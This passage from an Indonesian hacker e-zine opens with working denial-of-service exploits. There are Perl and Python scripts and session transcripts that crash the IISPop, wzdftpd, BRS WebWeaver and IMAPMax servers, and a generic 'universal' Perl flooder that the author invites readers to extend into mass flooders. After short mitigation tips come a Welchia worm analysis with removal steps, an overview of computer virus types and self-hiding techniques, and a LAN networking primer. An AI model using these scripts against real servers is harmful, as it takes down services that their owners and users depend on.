Sofie : Email server
Vendor : http://www.curtiscomp.com/
TIPE : Remote DoS

IISPop akan crash jika diserang dengan pengiriman paket data sebesar 289999 bytes,
versi yang vuneral dan telah di coba adalah V: 1.161 dan 1.181

Script: iispdos.pl

#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Tipe serangan : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[0]) {
print "Gunakan: perl iispdos.pl [host] \n";
exit;
}
# Data 289999 bytes
$buff = "A" x 289999;

print "Connecting ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "110",
Proto=> "tcp") or die;
print "Error: $_\n";
print "Connect !!\n";
print $connect "$buff\n";
close $connect;
print "Done \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "110",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# END.

2. Membunuh wzdftpd.
Sofie : wzdftpd
Vendor : http://www.wzdftpd.net

Proof of Concept:

% telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host

wzdftpd crash setelah diberikan perintah/command PORT !

3. Serangan 32700 karakter, DoS BRS WebWeaver.
Sofie : BRS WebWeaver V. 1.04
Vendor : www.brswebweaver.com
BugTraqer : euronymous /F0KP

}------- start of fadvWWhtdos.py ---------------{

#! /usr/bin/env python
## #!/usr/bin/python (Py Shebang, MOBY)
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fadvWWhtdos.py ---------------{

Serangan diatas mengirimkan 32700 karakter yang menyebabkan server crash !

4. Buffer Overflow pada MailMAX 5
Sofie : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)
Vendor : http://www.smartmax.com
BugTraqer : matrix at 0x36.org

Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command
SELECT. Dampak dari serangan ini adalah berhentiya server dan harus di-restart secara
manual.

Contoh eksploitasi:
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------

Perhatian !, contoh eksploitasi diatas menggunakan NetCat (nc), anda bisa dapatkan tool
ini pada url: http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat'


Jika kita perhatikan, serangan flooding memiliki kesamaan, yaitu - tentu saja -
membanjiri input dengan data yang besar. Serangan akan lebih efektif jika dilakukan pada
komputer esekutor yang memiliki bandwidth lebar.

Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
A. Connect ke korban (host, port).
B. Kirimkan paket data dalam jumlah besar.
C. Putuskan koneksi > selesai.

Dari step diatas, kita bisa membuat sebuah skrip universal untuk melakukan serangan DoS.
Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (
port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim).

-- udos.pl --

#!/usr/bin/perl
#
# $0 : udos.pl
# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
#
if (!$ARGV[2]) {
print "Gunakan % perl udos.pl [host] [port] [data] \n";
print "Contoh :\n";
print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
exit;
}
# Siapkan data
$buffer = "A" x $ARGV[2];
# Connect -> Korban
print "Connecting ... -> $ARGV[0] \n";
$con = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto=> "tcp") or die;
print "Error: $_ \n";
# Connect !
print "Connect !! \n";
print $con "$buffer\n";
close $con;
print "Done. \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# End.

-- udos.pl --

Skrip sederhana diatas hanya melakukan hubungan dengan server korban,
lalu mengirimkan flood dan melakukan post testing. Dengan sedikit
pemprograman anda dapat membuat sebuah 'Mass Flooder' atau 'Brute Force
Flooder', tergantung pada kreatifitas anda !


.o0 Penanggulangan serangan Denial of Service

Sejujurnya, bagian inilah yang paling sulit. Anda bisa lihat bagaimana
mudahnya menggunaka sploits/tool untuk membekukan Ms Windows, atau
bagaimana mudahnya melakukan input flooding dan membuat tool sendiri.
Namun Denial of service adalah masalah layanan publik.Sama halnya dengan
anda memiliki toko, sekelompok orang jahat bisa saja masuk beramai-ramai
sehingga toko anda penuh. Anda bisa saja mengatasi 'serangan' ini dengan
'menutup' toko anda - dan ini adalah cara paling efektif - namun jawaban
kekanak-kanakan demikian tentu tidak anda harapkan.

1. Selalu Up 2 Date.
Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk membekukan
Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal
untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 memiliki option
untuk menolak cracker untuk mengakses system.

2. Ikuti perkembangan security
Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal.
Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia
security. Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet'
dan 'terlatih' akan sangat mudah untuk memasuki sistem dan merusak -
tidak tertutup kemungkinan untuk melakukan Denial of Service -.
Berhubungan dengan 'Selalu Up 2 Date', Denial of service secara langsung
dengan Flooding dapat diatasi dengan menginstall patch terbaru dari vendor
atau melakukan up-date.

3. Teknik pengamanan httpd Apache.
+ Pencegahan serangan Apache Benchmark.
Hal ini sebenarnya sangat sulit untuk diatasi. Anda bisa melakukan
identifikasi terhadap pelaku dan melakukan pemblokiran manual melalui
firewall atau mekanisme kontrol Apache (Order, Allow from, Deny From ).
Tentunya teknik ini akan sangat membosankan dimana anda sebagai seorang
admin harus teliti.
Mengecilkan MexClients juga hal yang baik, analognya dengan membatasi
jumlah pengunjung akan menjaga toko anda dari 'Denial of Service'.
Jangan lupa juga menambah RAM.

4. Pencegahan serangan non elektronik.
Serangan yang paling efektif pada dasarnya adalah local. Selain efektif
juga sangat berbahaya. Jangan pernah berfikir sistem anda benar-benar aman,
atau semua user adalah orang 'baik'. Pertimbangkan semua aspek. Anda bisa
menerapkan peraturan tegas dan sanksi untuk mencegah user melakukan serangan
dari dalam. Mungkin cukup efektif jika dibantu oleh kedewasaan berfikir dari
admin dan user bersangkutan.

referensi:

[1] Kejahatan Internet, Trik Aplikasi dan Tip Penanggulangannya.
R. Kresno Aji, Agus Hartanto, Deni Siswanto, Tommy Chandra Wiratama.
Elexmedia Komputindo, ISBN: 979-20-3249-5
[2] 7 Cara Isengi Apache dan kiat mengatasinya.
Steven Haryanto, Masterweb Magazine Oktober 2001
[3] Introduction to Denial of Service
Hans Husman, t95hhu@student.tdb.uu.se
[4] CERT ADVISORIES.
www.cert.org
[5] Packet Storm Security
http://packetstormsecurity.nl
[6] BugTraq
www.securityfocus.com

*ezine

W32.Welchia.Worm

W32.Welchia.Worm adalah worm yang mampu mengeksplotasi berbagai kebocoran
(vulnerabilities), termasuk diantaranya:
- DCOM RPC vulnerability ..
(sebagimana di jelaskan dalam buletin keamanan Microsoft MS03-026)
yang menggunakan tcp port 135,menyerang secara spesifik kepada Windows XP
- Webdav vulnerability (sebagimana di jelaskan dalam buletin keamanan
Microsoft MS03-007) yang menggunakan tcp port 80., menyerang Mesin yang
menjalankan IIS 5.0, dan akan berdampak padawindows 2000 system,dan NT/XP.

dikenal juga dengan nama:
W32/Welchia.worm10240 [AhnLab], W32/Nachi.worm [McAfee],
WORM_MSBLAST.D [Trend], Lovsan.D [F-Secure],W32/Nachi-A [Sophos],
Win32.Nachi.A [CA], Worm.Win32.Welchia [KAV]

Tipe: Worm
Panjang infeksi : 10,240 bytes
Systems yang dapat di infeksi:Microsoft IIS, Windows 2000, Windows XP
Systems yang tidak terinfeksi:Linux, Macintosh, OS/2, UNIX, Windows 3.x,
Windows 95, Windows 98, Windows Me, Windows NT

Port yang digunakan: TCP 135(RPC DCOM), TCP 80(WebDav)

saat W32.Welchia.Worm di eksekusi, maka akan melakukan:

mengkopikan dirinya ke:

%System%\Wins\Dllhost.exe

catatan %Sytem% adalah variabel, worm akan mencari folder file system dan
mengkopikan dirinya,secara default adalah C:\Winnt\System32 (Windows 2000)
atau

C:\Windows\System32 (Windows XP).membuat kopi file
%System%\Dllcache\Tftpd.exe sebagai %System%\Wins\svchost.exe.

catatan :
Tftpd adalah program yang diijinkan, sehingga sulit untuk dideteksi oleh antivirus.

menambah subkeys:

RpcPatch

dan:

RpcTftpd

ke registry key di:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services


Membuat beberapa services:

Nama Service : RpcTftpd
Service Display Name: Network Connections Sharing
Service Binary: %System%\wins\svchost.exe
Service ini akan diset untuk berjalan secara manual.

Nama Service : RpcPatch
Service Display Name: WINS Client
Service Binary: %System%\wins\dllhost.exe

Service ini akan di set untuk dapat berjalan secara otomatis.
Proses terakhir adalah menghapus file %System%\msblast.exe sebagai tempat
pertama kali W32.Blaster.Worm


worm ini melakukan:
- mengirimkan packet ICMP /ping , untuk mengecek apakah komputer dengan ip tersebut aktif di jaringan.
- Setelah worm berhasil mengetahui bahwa mesin tersebut aktif di jaringan maka akan mengirimkan data ke port tcp 135 dan akan mengeksploitasi kelemahan DCOM RPC atau, akan mengirim date ke port tcp 80 untuk mengeksploitasi kelemahan Webdav
- membuat shell untuk remote pada mesin yang telah di ekspoitasi kelemahannya dan akan mencoba terhubung ke mesin penyerang dengan menggunakan prot tcp secara acak, antara 666 dan 765 untuk menerima instruksi.
- Menjalankan server TFTP pada mesin penyerang dan menginstruksikan mesin yang tereksploitasi (korban) untuk terhubung dan mendownload Dllhost.exe dan svchost.exe dari mesin penyerang. jika file %System%\dllcache\tftpd.exe ada, maka worm tidak akan mendownload svchost.exe.
- memeriksa versi Sistem operasi komputer tersebut, Nomor Service pack dan juga menghalangi untuk terhubung ke Microsoft's Windows Update dan mencegah komputer untuk DCOM RPC vulnerability patch.

Untuk memusnahkan worm ini dapat dilakukan beberapa cara:
* Gunakan peralatan removal W32.Welchia.WOrm
* Menghapus secara manual:
1 menDisable System Restore (Windows XP).
mengapa? XP kuhusnya secara default mengenable system restore,
mengapa berbahaya? karena virus, worm atau trojan yang menginfeksi
komputer anda mungkin saja di backup juga oleh system restore dan yang
membuat lebih berbahaya adalah windows melindungi program lain,termasuk
antivirus untuk memodifikasi (menquarantine, menghapus dan membersihkan)
sytem restore=system restore bisa jadi tempat teraman bagi virus dkk.
karena itu anda wajib men-disablekan system restore anda

untuk mematikan system restore:
- anda harus sebagaoi administrator (xp)
- masuk ke control panel
- pilih system, di system properties pilih System restore
- centang turn off system restore


2 Update virus definition dari antivirus yang digunakan. anda hanya perlu
mengunjungi situs antivirus anda, atau menjalankan Live Update langsung
dari program antivirus anda untuk melaukan update.

3 Restart komputer anda dalam save mode untuk menghentikan Worm.
untuk windows 95/98/me anda bisa masuk ke save mode setelah restart
sedangkan,
untuk xp/nt/win 2000
anda dapat menghentikan kerja virus buat sementara dengan cara:
-masuk control panel
-pilih services pada administrative tools
-scroll kebawah sampai anda temukan
+ Network Connections Sharing
+ WINS Client
-klik-kanan dan pilih stop

4 jalankan full system scan dan delete semua file yang dideteksi sebagai
W32.Welchia.Worm.jalankan full scan dan konfigurasi terlebih dahulu
antivirus anda jika ditemukan ada file yang terinfeksi W32.Welchia.Worm
maka hapus file tersebut

5 Delete values& subkeys yang dibuat oleh virus di registry.
hal ini sedikit beresiko, sebelum anda lakukan, backup dulu registry anda

-klik start -run dan ketik regedit
masuk ke key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

hapus subkey berikut:

RpcPatch

dan

RpcTftpd
simpan perubahan dan keluar dari registry

6 Delete Svchost.exe file.
masuk ke folder %system%wins dan hapus semua file svchost.exe

*ezine

Pernak - Pernik Tentang Virus

pengantar
=========

Apakah Kalian pernah mendengar apa itu virus, tahukah kalian apa yang
dimaksud virus itu disini aku akan coba mengartikan apa itu virus.
virus yang lebih dikenal dalam istilah kedokteran atau arti virus sebagai
biological virusses" inipun ternyata populer juga di dunia yang terdiri dari
elektron ini. hal ini terjadi dikarenakan kemiripan dalam mekanisme
penyebarannya.

Virus komputer bisa diartikan secara gamblang adalah suatu program komputer
biasa. tetapi memiliki perbedaan yang mendasar dengan program-program
lainnya,yaitu dia dibuat untuk menulari program program lainnya, mengubah,
memanipulasinya bahkan sampai merusaknya.

tetapi ada yang perlu dicatat disini, virus hanya akan menulari apabila
program pemicu atau program yang telah terinfeksi tadi dieksekusi,
disinilah perbedaannya dengan "worm". Aku tidak akan mencoba membahas worm
karena nanti akan mengalihkan kita dari pembahasan mengenai virus ini.

asal muasal virus
=================

1949, John Von Neuman, menggungkapkan "teori self altering automata"
yang merupakan hasil riset dari para ahli matematika.
1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori yang
diungkapkan oleh john v neuman, mereka bermain-main dengan teori tersebut
untuk suatu jenis permainan/game. Para ahli tersebut membuat program yang
dapat memperbanyak dirinya dan dapat menghancurkan program buatan lawan.
Program yang mampu bertahan dan menghancurkan semua program lain, maka akan
dianggap sebagai pemenangnya. Permainan ini akhirnya menjadi permainan
favorit ditiap-tiap lab komputer.semakin lama mereka pun sadar dan mulai
mewaspadai permainan ini dikarenakan program yang diciptakan makin lama makin
berbahaya, sehingga mereka melakukan pengawasan dan pengamanan yangketat.
1980, program tersebut yang akhirnya dikenal dengan "virus" ini berhasil
menyebar diluar lingkungan laboratorium, dan mulai beredar di dunia cyber.
1980, mulailah dikenal virus virus yang menyebar di dunia cyber.

Jenis-Jenis Virus
=================

Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba
memberikan penjelasan tentang jenis jenis virus yang sering berkeliaran
di dunia cyber.

1.Virus Makro
=============
Aku rasa kita semua sudah sangat sering mendengar tentang virus ini. Virus ini
ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa
pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila
aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada komputer
mac dapat menjalankan aplikasi word maka virus ini bekerja pada komputer
bersistem operasi Mac.
contoh virus:
-variant W97M, misal W97M.Panther panjang 1234 bytes,akanmenginfeksi NORMAL.DOT
dan menginfeksi dokumen apabila dibuka.
-WM.Twno.A;TW :: 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan
bahasa makro, biasanya berekstensi *.DOT dan *.DOC
-dll

2.Virus Boot Sector
===================
Virus Boot sector ini sudah umum sekali menyebar (terus terang hardiskku sering
diformat gara gara virus ini :P, tapi karena itu aku sobatan ma dia, :)).
Virus ini dalam menggandakan dirinya akan memindahkan atau menggantikan boot
sector asli dengan program booting virus. Sehingga saat terjadi booting maka
virus akan di load kememori dan selanjutnya virus akan mempunyai kemampuan
mengendalikan hardware standar(ex::monitor, printer dsb) dan dari memori ini
pula virus akan menyebar keseluruh drive yang ada dan terhubung kekomputer
(ex: floopy, drive lain selain c:\)
contoh virus ::
-varian virus wyx (langganan gwa nih :) ex: wyx.C(B) menginfeksi boot record dan
floopy ; panjang :520 bytes; karakteristik : memory resident dan terenkripsi)
-varian V-sign : menginfeksi : Master boot record ; panjang 520 bytes;
karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
-Stoned.june 4th/ bloody!: menginfeksi : Master boot record dan floopy;
panjang 520 bytes; karakteristik: menetap di memori (memory resident),
terenkripsi dan menampilkan pesan "Bloody!june 4th 1989" stelah komputer
melakukan booting sebanyak 128 kali)

3.Stealth Virus
===============
Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal
dengan "Interrupt interceptor" . virus ini berkemampuan untuk mengendaikan
instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya
baik secara penuh ataupun ukurannya .
contoh virus:
-Yankee.XPEH.4928, menginfeksi file *.COM dan *.EXE ; panjang 4298 bytes;
karakteristik: menetap di memori, ukuran tersembunyi, memiliki pemicu
-WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth
dimasukkan pula disini), menginfeksi floopy dan motherboot record; panjang
520 bytes;menetap di memori; ukuran dan virus tersembunyi.
-Vmem(s): menginfeksi file file *.EXE, *.SYS, dan *.COM ; panjang fie 3275
bytes; karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.
-dll

4.Polymorphic Virus
===================
Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu
berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah
strukturnya setiap kali selesai menginfeksi file/program lain.
contoh virus:
-Necropolis A/B, menginfeksi file *.EXE dan *.COM; panjang file 1963 bytes;
karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan
apat berubah ubah struktur
-Nightfall, menginfeksi file *.EXE; panjang file 4554 bytes; karakteristik :
menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu, terenkripsi
dan dapat berubah ubah struktur
-dll

5.Virus File/Program
====================
Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi,
baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi dari
virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.

6.Multi Partition Virus
=======================
Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinyapekerjaan
yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file file *.EXE dan juga
menginfeksi Boot Sector.


Kriteria Virus
==============
Suatu virus , dapat dikatakan adalah benar benar virus apabila minimal memiliki 5
kriteria (kriteria ini aku dapatkan dari sebuah sumber terpercaya :))
1.kemampuan suatu virus untuk mendapatkan informasi
2.kemampuannya untuk memeriksa suatu program
3.kemampuannya untuk menggandakan diri dan menularkan
4.kemampuannya melakukan manipulasi
5.kemampuannya untuk menyembunyikan diri.


Sekarang akan aKu coba jelaskan dengan singkat apa yang dimaksud dengan tiap-tiap
kemampuan itu dan mengapa ini sangat diperlukan.

Kemampuan untuk mendapatkan informasi
=====================================
Pada umumnya suatu virus memerlukan daftar nama nama file yang ada dalam suatu
directory, untuk apa? agar dia dapat mengenali program program apa saja yang akan
dia tulari, semisal virus makro yang akan menginfeksi semua file berekstensi *.doc
setelah virus itu menemukannya, disinilah kemampuan mengumpulkan informasi itu
diperlukan agar virus dapat membuat daftar/dat semua file terus memilah dengan
mencari file file yang bisa ditulari. Biasanya data ini tercipta saat program yang
tertular atau terinfeksi atau bahkan program virus ini dieksekusi. Sang virus akan
segera melakukan pengumpulan data dan menaruhnya di RAM (biasanya :P ) ,
sehingga apabila komputer dimatikan semua data hilang tetapi akan tercipta setiap
program bervirus dijalankan biasanya dibuat hidden oleh virus (agar gak keliatan).

Kemampuan memeriksa suat program
================================
Suatu virus juga sangat amat harus (berlebihan gak ya :P) bisauntuk memeriksa suatu
program yang akan ditulari, misalnya ia bertugas menulari program berekstensi *.doc,
dia harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum,karena
jika sudah maka dia akan percuma menularinya 2 kali (virus aja perhitungan coba,:)).
Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan
menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah memiliki / memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut.Contoh penandaan adalah misalnya memberikan suatu byte yang unik disetiap file yang telah terinfeksi.

Kemampuan untuk menggandakan diri
=================================
Kalo ini emang virus "bang-get", maksudnya tanpa ini tak adalah virus. inti dari
virus adalah kemampuan mengandakan diri dengan cara menulari program lainnya. Suatu
virus apabila telah menemukan calon korbannya (baik file atau program) maka
ia akan mengenalinya dengan memeriksanya,jika belum terinfeksi maka sang virus akan
memulai aksinya untuk menulari dengan cara menuliskan byte pengenal pada program/
file tersebut,dan seterusnya mengcopikan/menulis kode objek virus diatasfile/program
yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk menulari/
menggandakan dirinya adalah:

a.File/Program yanga akan ditulari dihapus atau diubah namanya. kemudian diciptakan
suatu file menggunakan nama itu dengan menggunakan virus tersebut (maksudnya virus
mengganti namanya dengan nama file yang dihapus)
b.Program virus yang sudah di eksekusi/load ke memori akan langsung menulari file
file lain dengancara menumpangi seluruh file/program yang ada.

Kemampuan mengadakan manipulasi
===============================
Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file/program. isi dari suatu rutin ini dapat beragam mulai dari yang teringan sampai pengrusakan. rutin ini umumnya digunain buat memanipulasi program ataupun mempopulerkan pembuatnya! (:P) Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System) , sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi.
misal:
a.Membuat gambar atau pesan pada monitor
b.mengganti/mengubah ubah label dari tiap file,direktori,atau label dari drive di pc
c.memanipulasi program/file yang ditulari
d.merusak program/file
e.Mengacaukan kerja printer , dsb

Kemampuan Menyembunyikan diri
=============================
Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terjlaksana.
langkah langkah yang biasa dilakukan adalah:
-Program asli/virus disimpan dalam bentuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai.
-Program virus diletakkan pada Boot Record atau track yang jarang diperhatikan oleh komputer itu sendiri
-Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak berubah ukurannya
-Virus tidak mengubah keterangan waktu suatu file
-dll

*ezine

Pengenalan Jaringan LAN

Pengertian dan Prinsip Kerja LAN
================================

LAN dapat definisikan sebagai network atau jaringan sejumlah sistem
komputer yang lokasinya terbatas didalam satu gedung, satu kompleksgedung
atau suatu kampus dan tidak menggunakan media fasilitas komunikasi umum
seperti telepon, melainkan pemilik dan pengelola media komunikasinya
adalah pemilik LAN itu sendiri.
Dari definisi diatas dapat kita ketahui bahwa sebuah LAN dibatasi oleh
lokasi secara fisik. Adapun penggunaan LAN itu sendiri mengakibatkansemua
komputer yang terhubung dalam jaringan dapat bertukar data atau dengan
kata lain berhubungan. Kerjasama ini semakin berkembang dari hanya
pertukaran data hingga penggunaan peralatan secara bersama.
LAN yang umumnya menggunakan hub, akan mengikuti prinsip kerja hub itu
sendiri. Dalam hal ini adalah bahwa hub tidak memiliki pengetahuantentang
alamat tujuan sehingga penyampaian data secara broadcast, dan juga karena
hub hanya memiliki satu domain collision sehingga bila salah satu port
sibuk maka port-port yang lain harus menunggu.

Komponen-komponen Dasar LAN
===========================

Beberapa komponen dasar yang biasanya membentuk suatu LAN adalah sebagai
berikut:

•Workstation
============
Workstation merupakan node atau host yang berupa suatu sistem komputer.
Sistem komputer ini dapat berupa PC atau dapat pula berupa suatu komputer
yang besar seperti sistem minicomputer, bahkan suatu mainframe.
Workstation dapat bekerja sendiri (stand-alone) dapat pula menggunakan
jaringan untuk bertukar data dengan workstation atau user yang lain.
•Server
=======
Perangkat keras (hardware) yang berfungsi untuk melayani jaringan dan
workstation yang terhubung pada jaringan tersebut.pada umumnya sumber
daya (resources) seperti printer, disk, dan sebagainya yang hendak
digunakan secara bersama oleh para pemakai di workstation berada dan
bekerja pada server. Berdasarkan jenis pelayanannya dikenal disk server,
file server, print server, dan suatu server juga dapat mempunyai beberapa
fungsi pelayanan sekaligus.

•Link (hubungan)
================
Workstation dan server tidak dapat berfungsi apabila peralatan tersebut
secara fisik tidak terhubung. Hubungan tersebut dalam LAN dikenal sebagai
media transmisi yang umumnya berupa kabel. Adapun beberapa contoh dari
link adalah:
1.Kabel Twisted Pair
•Kabel ini terbagi dua, yaitu Shielded Twisted Pair dan Unshielded Twisted
Pair(UTP)
•Lebih banyak dikenal karena merupakan kabel telpon
•Relatif murah
•Jarak yang pendek
•Mudah terpengaruh oleh gangguan
•Kecepatan data yang dapat didukung terbatas, 10-16 Mbps

2.Kabel Coaxial
•Umumnya digunakan pada televisi
•Jarak yang relatif lebih jauh
•Kecepatan pengiriman data lebih tinggi di banding Twisted Pair, 30 Mbps
•Harga yang relatif tidak mahal
•Ukurannya lebih besar dari Twisted Pair

3.Kabel Fiber Optic
•Jarak yang jauh
•Kecepatan data yang tinggi, 100 Mbps
•Ukuran yang relatif kecil
•Sulit dipengaruhi gangguan
•Harga yang relatif masih mahal
•Instalasi yang relatif sulit


•Network Interface Card (NIC)
=============================
Suatu workstation tidak dihubungkan secara langsung dengan kabel jaringan
ataupun tranceiver cable, tetapi melalui suatu rangkaian elektronika yang
dirancang khusus untuk menangani network protocol yang dikenal dengan
Network Interface Card (NIC).

•Network Software
==================
Tanpa adanya software jaringan maka jaringan tersebut tidak akan bekerja
sebagaimana yang dikehendaki. Software ini juga yang memungkinkan sistem
komputer yang satu berkomunikasi dengan sistem komputer yang lain.

Peralatan Pendukung LAN
=======================

a.Repeater
•Pada OSI, bekerja pada lapisan Physical
•Meneruskan dan memperkuat sinyal
•Banyak digunakan pada topologi Bus
•Penggunaannya mudah dan Harga yang relatif murah
•Tidak memiliki pengetahuan tentang alamat tujuan sehingga penyampaian
data secara broadcast
•Hanya memiliki satu domain collision sehingga bila salah satu port sibuk
maka port-port yang lain harus menunggu.
b.Hub
•Bekerja pada lapisan Physical
•Meneruskan sinyal
•Tidak memiliki pengetahuan tentang alamat tujuan
•Penggunaannya relatif mudah dan harga yang terjangkau
•Hanya memiliki satu buah domain collision
c.Bridge
•Bekerja di lapisan Data Link
•Telah menggunakan alamat-alamat untuk meneruskan data ke tujuannya
•Secara otomatis membuat tabel penterjemah untuk diterima masing2 port
d.Switch
•Bekerja di lapisan Data Link
•Setiap port didalam swith memiliki domain collision sendiri-sendiri
•Memiliki tabel penterjemah pusat yang memiliki daftar penterjemah untuk
semua port
•Memungkinkan transmisi secara full duflex (dua arah)
e.Router
•Router berfungsi menyaring atau memfilter lalu lintas data
•Menentukan dan memilih jalur alternatif yang akan dilalui oleh data
•Menghubungkan antar jaringan LAN, bahkan dengan WAN

Topologi LAN
=============

Pengertian topologi Jaringan adalah susunan lintasan aliran data didalam
jaringan yang secara fisik menghubungkan simpul yang satu dengan simpul
lainnya. Berikut ini adalah beberapa topologi jaringan yang ada dan
dipakai hingga saat ini, yaitu:
•Topologi Star
Beberapa simpul/node dihubungkan dengan simpul pusat/host, yang membentuk
jaringan fisik seperti bintang, semua komunikasi ditangani langsung dan
dikelola oleh host yang berupa mainframe komputer.

•Topologi Hierarkis
Berbentuk seperti pohon bercabang yang terdiri dari komputer induk(host)
dihubungkan dengan simpul/node lain secara berjenjang. Jenjang yang lebih
tinggi berfungsi sebagai pengatur kerja jenjang dibawahnya.

•Topologi Bus
Beberapa simpul/node dihubungkan dengan jalur data (bus). Masing2 node
dapat melakukan tugas-tugas dan operasi yangberbeda namun semua mempunyai
hierarki yang sama.

•Topologi Loop
Merupakan hubungan antar simpul/node secara serial dalam bentuk suatu
lingkaran tertutup. Dalam bentuk ini tak ada central node/host, semua
mempunyai hierarki yang sama.

•Topologi Ring
Bentuk ini merupakan gabungan bentuk topologi loop dan bus, jika salah
satu simpul/node rusak, maka tidak akan mempengaruhi komunikasi node
yang lain karena terpisah dari jalur data.

•Topologi Web
Merupakan bentuk topologi yang masing-masing simpul/node dalam jaringan
dapat saling berhubungan dengan node lainnya melalui beberapa link.
Suatu bentuk web network dengan n node, akan menggunakan link sebanyak
n(n-1)/2.

Dengan menggunakan segala kelebihan dan kekurangan masing2 konfigurasi,
memungkinkan dikembangkannya suatu konfigurasi baru yang menggabungkan
beberapa topologi disertai teknologi baru agar kondisi ideal suatu
sistem jaringan dapat terpenuhi.

*ezine